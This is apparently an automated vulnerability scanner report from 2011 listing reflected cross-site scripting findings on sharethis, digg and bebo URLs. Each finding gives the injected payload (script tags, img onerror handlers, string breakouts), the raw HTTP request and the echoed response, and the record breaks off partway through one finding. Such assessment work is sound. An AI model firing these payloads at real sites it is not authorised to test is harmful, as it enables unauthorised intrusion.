The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://seg.sharethis.com/socialOptimization.ps.js [campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Issue detail

The value of the campaign request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fe87'%3balert(1)//a1486ba0d2b was submitted in the campaign parameter. This input was echoed as 7fe87';alert(1)//a1486ba0d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie97fe87'%3balert(1)//a1486ba0d2b HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:05 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1424

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie97fe87';alert(1)//a1486ba0d2b';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="strtframe" allowTransparency="true" style="body{background:transparent;}"
...[SNIP]...
2.2. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c4f69<script>alert(1)</script>20e43ada28b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.htmlc4f69<script>alert(1)</script>20e43ada28b HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 06 Jul 2011 11:55:24 GMT
Via: NS-CACHE: 100
Etag: "2a89518f414c8e7d929f49e94144265e8d188287"
Content-Length: 193
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Wed, 06 Jul 2011 12:05:23 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.htmlc4f69<script>alert(1)</script>20e43ada28b", "diggs": 0});
2.3. http://www.bebo.com/Profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76260'%3b31937eadaad was submitted in the REST URL parameter 1. This input was echoed as 76260';31937eadaad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Profile.jsp76260'%3b31937eadaad HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14161
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
m.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/profile76260';31937eadaad/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.4. http://www.bebo.com/Profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7fa9'><script>alert(1)</script>05692309f65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Profile.jspf7fa9'><script>alert(1)</script>05692309f65 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14386
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/profilef7fa9'><script>alert(1)</script>05692309f65&QueryString=&Lang=nl'>
...[SNIP]...
2.5. http://www.bebo.com/Profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ae31<script>alert(1)</script>f9c6fa1b86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Profile.jsp1ae31<script>alert(1)</script>f9c6fa1b86e HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14368
Date: Wed, 06 Jul 2011 14:07:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/profile1ae31<script>alert(1)</script>f9c6fa1b86e page, please try again.</div>
...[SNIP]...
2.6. http://www.bebo.com/Profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9d2"><img%20src%3da%20onerror%3dalert(1)>04e16ce8f26 was submitted in the REST URL parameter 1. This input was echoed as 1b9d2"><img src=a onerror=alert(1)>04e16ce8f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Profile.jsp1b9d2"><img%20src%3da%20onerror%3dalert(1)>04e16ce8f26 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-profile1b9d2"><img src=a onerror=alert(1)>04e16ce8f26" >
...[SNIP]...
2.7. http://www.bebo.com/c/games [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb8ef'><script>alert(1)</script>06c303df1ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesbb8ef'><script>alert(1)</script>06c303df1ce HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14368
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/gamesbb8ef'><script>alert(1)</script>06c303df1ce&QueryString=&Lang=nl'>
...[SNIP]...
2.8. http://www.bebo.com/c/games [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56d4e'%3b1fde5453e13 was submitted in the REST URL parameter 2. This input was echoed as 56d4e';1fde5453e13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/games56d4e'%3b1fde5453e13 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14157
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/games56d4e';1fde5453e13/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.9. http://www.bebo.com/c/games [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c709f<script>alert(1)</script>864df3dcbf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesc709f<script>alert(1)</script>864df3dcbf3 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14350
Date: Wed, 06 Jul 2011 14:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/gamesc709f<script>alert(1)</script>864df3dcbf3 page, please try again.</div>
...[SNIP]...
2.10. http://www.bebo.com/c/games [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba66"><img%20src%3da%20onerror%3dalert(1)>6a4e8145e3f was submitted in the REST URL parameter 2. This input was echoed as 6ba66"><img src=a onerror=alert(1)>6a4e8145e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/games6ba66"><img%20src%3da%20onerror%3dalert(1)>6a4e8145e3f HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14451
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-games6ba66"><img src=a onerror=alert(1)>6a4e8145e3f" >
...[SNIP]...
2.11. http://www.bebo.com/c/games/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c6532'><script>alert(1)</script>5330bf814b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/gamesc6532'><script>alert(1)</script>5330bf814b/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14361
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/gamesc6532'><script>alert(1)</script>5330bf814b&QueryString=&Lang=nl'>
...[SNIP]...
2.12. http://www.bebo.com/c/games/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c6a"><img%20src%3da%20onerror%3dalert(1)>723b17830da was submitted in the REST URL parameter 2. This input was echoed as 46c6a"><img src=a onerror=alert(1)>723b17830da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/games46c6a"><img%20src%3da%20onerror%3dalert(1)>723b17830da/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14453
Date: Wed, 06 Jul 2011 14:07:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-games46c6a"><img src=a onerror=alert(1)>723b17830da" >
...[SNIP]...
2.13. http://www.bebo.com/c/games/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c3e4<script>alert(1)</script>f3051a94c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/games8c3e4<script>alert(1)</script>f3051a94c5/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14343
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/games8c3e4<script>alert(1)</script>f3051a94c5/ page, please try again.</div>
...[SNIP]...
2.14. http://www.bebo.com/c/games/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/games/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa6c'%3b95d3aefc4c6 was submitted in the REST URL parameter 2. This input was echoed as 2aa6c';95d3aefc4c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/games2aa6c'%3b95d3aefc4c6/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14159
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/games2aa6c';95d3aefc4c6//'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTra
...[SNIP]...
2.15. http://www.bebo.com/c/invite/join [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc5ae<script>alert(1)</script>5db11e3ec76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invitecc5ae<script>alert(1)</script>5db11e3ec76/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14404
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/invitecc5ae<script>alert(1)</script>5db11e3ec76/join page, please try again.</div>
...[SNIP]...
2.16. http://www.bebo.com/c/invite/join [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80dd5'%3bccc67b1d634 was submitted in the REST URL parameter 2. This input was echoed as 80dd5';ccc67b1d634 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/invite80dd5'%3bccc67b1d634/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14211
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/invite80dd5';ccc67b1d634/join/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pag
...[SNIP]...
2.17. http://www.bebo.com/c/invite/join [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8281a'><script>alert(1)</script>a91f426563e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invite8281a'><script>alert(1)</script>a91f426563e/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14422
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/invite8281a'><script>alert(1)</script>a91f426563e/join&QueryString=&Lang=nl'>
...[SNIP]...
2.18. http://www.bebo.com/c/invite/join [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65e2"><img%20src%3da%20onerror%3dalert(1)>783c94f6204 was submitted in the REST URL parameter 2. This input was echoed as c65e2"><img src=a onerror=alert(1)>783c94f6204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invitec65e2"><img%20src%3da%20onerror%3dalert(1)>783c94f6204/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14505
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-invitec65e2"><img src=a onerror=alert(1)>783c94f6204-join" >
...[SNIP]...
2.19. http://www.bebo.com/c/invite/join [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8253<img%20src%3da%20onerror%3dalert(1)>5d0e25f3a03 was submitted in the REST URL parameter 3. This input was echoed as d8253<img src=a onerror=alert(1)>5d0e25f3a03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invite/joind8253<img%20src%3da%20onerror%3dalert(1)>5d0e25f3a03 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14213
Date: Wed, 06 Jul 2011 14:07:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
